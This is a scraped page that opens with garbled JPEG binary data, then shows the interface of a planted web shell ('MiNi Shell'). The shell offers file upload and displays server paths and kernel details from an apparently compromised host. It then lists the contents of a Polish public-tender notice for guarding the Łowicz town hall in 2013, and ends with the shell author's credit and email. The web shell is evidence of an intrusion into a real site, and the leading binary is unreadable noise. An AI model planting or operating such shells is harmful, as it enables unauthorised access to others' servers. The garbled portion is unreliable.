JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20121130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20121130/253793-N-2012.html

<p class="kh_header"><b>Łowicz: Stała ochrona realizowana w formie bezpośredniej ochrony fizycznej osób i mienia w obiektach Urzędu Miejskiego w Łowiczu- 2013r.</b><br>
<b>Numer ogłoszenia: 253793 - 2012; data zamieszczenia: 30.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Łowiczu , Stary Rynek 1, 99-400 Łowicz, woj. łódzkie, tel. 046 830-91-51, faks 046 830-91-60.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.um.lowicz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Stała ochrona realizowana w formie bezpośredniej ochrony fizycznej osób i mienia w obiektach Urzędu Miejskiego w Łowiczu- 2013r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: 
a.Stała ochrona realizowana w formie bezpośredniej ochrony fizycznej  osób i mienia w obiektach Urzędu Miejskiego w Łowiczu- Ratusz, budynek B i budynek C - prowadzona w następujących dniach i godzinach
 poniedziałki, wtorki , środy, czwartki ,piątki - od godz.1530 do godz. 830
  dnia następnego, 
 w dni wolne od pracy - przez 24 godz. na dobę, 
 prace porządkowe wykonywane przez pracowników ochrony, polegające na utrzymaniu czystości i odpowiedniego wyglądu estetycznego na dziedzińcach Urzędu Miejskiego w Łowiczu i chodnika przed jego siedzibą - Ratuszem   zamiatanie , odśnieżanie , posypywanie oblodzonych ciągów pieszych piaskiem  
w ilości 7003 roboczogodzin.
 b. Ochrona fizyczna osób i mienia Urzędu Miejskiego w Łowiczu  podczas imprez masowych - zgodnie z pisemnym zleceniem Zamawiającego z 1 tygodniowym uprzedzeniem w ilości 200 roboczogodzin. 
Łączna ilość godzin świadczenia prac objętych przedmiotem zamówienia wynosi 7203 roboczogodziny.
Wspólny Słownik Zamówień ( CPV) 79.71.00.00-4 Usługi ochroniarskie.

2.Ochrona obiektów Urzędu Miejskiego w Łowiczu polega na:

a) stałej ochronie realizowanej w formie bezpośredniej ochrony fizycznej osób i mienia  w obiektach Urzędu Miejskiego w Łowiczu polegającej na strzeżeniu mienia znajdującego się w obiektach Urzędu.
b) zabezpieczeniu go przed próbami dewastacji, uszkodzenia, bądź kradzieży, w tym w wyniku włamania z zewnątrz jak i wewnątrz ochranianych budynków,
c) ochronie w sytuacjach szczególnego zagrożenia życia i zdrowia osób przebywających na terenie chronionych obiektów,
d)powiadamiania odpowiednich służb i straży pożarnej o zagrożeniach,
3.Obowiazki  pracowników ochrony.
Do podstawowych obowiązków pracownika ochrony należy:
 sumienne strzeżenie  mienia znajdującego się w budynkach Urzędu i na
 chronionym terenie oraz podejmowanie działań interwencyjnych w przypadku 
stwierdzenia zakłóceń porządku.  
Ochrona obiektów przed rabunkiem, zagrożeniem wybuchu, pożarem, napadem, kradzieżą, dewastacją. 
Ochrona w sytuacjach szczególnego zagrożenia życia i zdrowia osób przebywających na terenie chronionych obiektów.
Powiadomienie wskazanego pracownika Urzędu oraz właściwych służb: policji, pogotowia i straży pożarnej w przypadku stwierdzenia  w chronionych obiektach awarii, włamania lub pożaru oraz podjęcie podstawowych działań zabezpieczających.
Obsługa istniejących w budynkach systemów alarmowych ,ppoż., włamania
 i monitoringu.
Przed otwarciem kasy, pracownik ochrony towarzyszy kasjerowi podczas otwierania pomieszczenia Sejfu i przenoszenia gotówki oraz papierów wartościowych do pomieszczenia Kasa. W ten sam sposób odbywa się przeniesienie nie odprowadzonej gotówki i papierów wartościowych z pomieszczenia Kasa do pomieszczenia Sejf.
Po zakończeniu pracy przez pracowników Urzędu, pracownik ochrony przyjmuje od nich klucze i przechowuje je w pomieszczeniu portierni. Klucze od WSO, kancelarii tajnej i skarbca, strażnik deponuje w sejfie, a fakt wydania i odebrania kluczy odnotowuje każdorazowo w odpowiedniej księdze.
Po otrzymaniu wszystkich kluczy od pomieszczeń biurowych, strażnik zobowiązany jest do sprawdzenia właściwego zamknięcia drzwi i okien w budynkach.W przypadku stwierdzenia niewłaściwego ich zamknięcia - strażnik powinien dokładnie pozamykać okna i drzwi. Po wykonaniu tych czynności i opuszczeniu obiektów przez wszystkie osoby, strażnik zobowiązany jest załączyć system alarmowy. Wyłączenia systemu dokonuje strażnik następnego dnia, w chwili przyjścia do pracy pierwszego pracownika (dot. dni roboczych).
W dni wolne od pracy, wyłączenia systemu strażnik dokonuje po przybyciu do Urzędu:
jego kierownictwa (burmistrzowie, sekretarz, skarbnik)  - pracowników, których przebywanie na terenie Urzędu spowodowała konieczność wykonania określonych czynności służbowych, co uzgodnione  zostało z kierownictwem Urzędu.
 Każdy fakt załączenia się alarmu powinien być odnotowany przez strażnika w
 książce przebiegu służby, z podaniem godziny wystąpienia alarmu i przypuszczalnej przyczyny jego wywołania.
 W czasie służby strażnik powinien co 2 godziny obchodzić cały teren posterunku i sprawdzać  każdorazowo ogrodzenie, oświetlenie, okna,  zamki w drzwiach itp. i odnotować obchód w  księdze obchodów.
W czasie służby nie wolno strażnikowi spać, pić alkoholu, przyjmować odwiedzin, oddalać się poza teren Urzędu.
W czasie pełnienia służby nie wolno przebywać na terenie strzeżonego obiektu  nikomu poza strażnikiem, z wyjątkiem osób mających na to zgodę od  kierownictwa Urzędu.
Strażnik zobowiązany jest do przestrzegania tajemnicy służbowej.
W czasie służby strażnik powinien udzielać, zgodnie z posiadaną wiedzą  informacji dotyczących funkcjonowania Urzędu.
Strażnik zobowiązany jest do utrzymywania czystości na terenie zewnętrznym
obiektu(zamiatanie dziedzińców i chodnika przed Urzędem, odśnieżanie i  posypywanie piaskiem ciągów pieszych, podlewanie zieleni).
Strażnicy powinni być jednakowo ubrani i posiadać odpowiednie  identyfikatory.
Strażnik jest odpowiedzialny za powierzone jego opiece mienie i za wydarzenia na posterunku  w czasie jego służby. Odpowiedzialny jest również materialnie za braki wynikłe z jego winy.
Pracownicy ochrony w czasie pełnienia służby będą stosować się do poleceń osób wskazanych przez Zamawiającego.
Otwierania i zamykanie bram.
Sprawowanie kontroli nad legalnością wynoszenia z budynku sprzętu elektronicznego, informatycznego i innych składników majątku urzędu.
Znajomość rozmieszczenia i umiejętność obsługi wyłączników prądu, instalacji ppoż.  zaworów wodnych i gazowych.

3.1Za sytuację szczególnego zagrożenia uznaje się w szczególności :
pożar i inne zdarzenia losowe na terenie chronionych obiektów,
kradzież z włamaniem, wybuch lub zagrożenie wybuchem w obiekcie chronionym,
terroryzm,
rabunek w obiektach chronionych.
3.2.Wykonawca na własny koszt wyposaży pracowników ochrony w jednolite mundury z emblematami oferenta, potrzebny sprzęt specjalnego przeznaczenia oraz środki łączności.
3.3.Wykonawca ponosi odpowiedzialność za szkodę wynikającą z niewykonania,
nienależytego wykonania lub wykonania z nienależytą starannością obowiązków
 zakresie ochrony na zasadach określonych w kodeksie cywilnym.

4Pracownicy przewidziani do realizacji Zamówienia  powinni być w wieku 25 - 60 lat, oraz cechować się bardzo dobrymi warunkami fizycznymi i wysoką kulturą.
5Pracownicy ochrony w czasie pełnienia służby będą stosować się do poleceń osób wskazanych przez Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże że, posiada aktualna koncesję, zezwolenie lub licencje wydaną przez Ministra Spraw Wewnętrznych i Administracji na prowadzenie działalności gospodarczej w zakresie ochrony osób i mienia;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże  że, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wykonał , a w przypadku świadczeń okresowych lub ciągłych również wykonuje co najmniej 3 usługi o wartości minimum- 70.000,00 zł. brutto każda z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że usługi zostały wykonane lub są wykonywane należycie.- zał. Nr 5</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże, że do realizacji przedmiotu zamówienia  zatrudni pracowników nie karanych, w tym 1 pracownika, posiadającego co najmniej licencję pracownika ochrony fizycznej I stopnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże że, posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na wartość co najmniej 200.000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oświadczenie w trybie art. 22 o spełnieniu przez Wykonawcę warunków określonych w art. 22 ust.1 ustawy według wzoru stanowiącego zał. nr 2 do SIWZ

oświadczenie, że  do realizacji przedmiotu zamówienia Wykonawca zatrudni pracowników nie karanych, w tym jednego pracownika posiadającego licencję pracownika ochrony fizycznej I stopnia  wg wzoru stanowiącego załącznik nr 4 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.lowicz.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Łowiczu, Stary Rynek 1, 99-400 Łowicz, bud A pok.13.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.12.2012 godzina 10:00, miejsce: Urząd Miejski w Łowiczu, Stary Rynek 1, 99-400 Łowicz, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com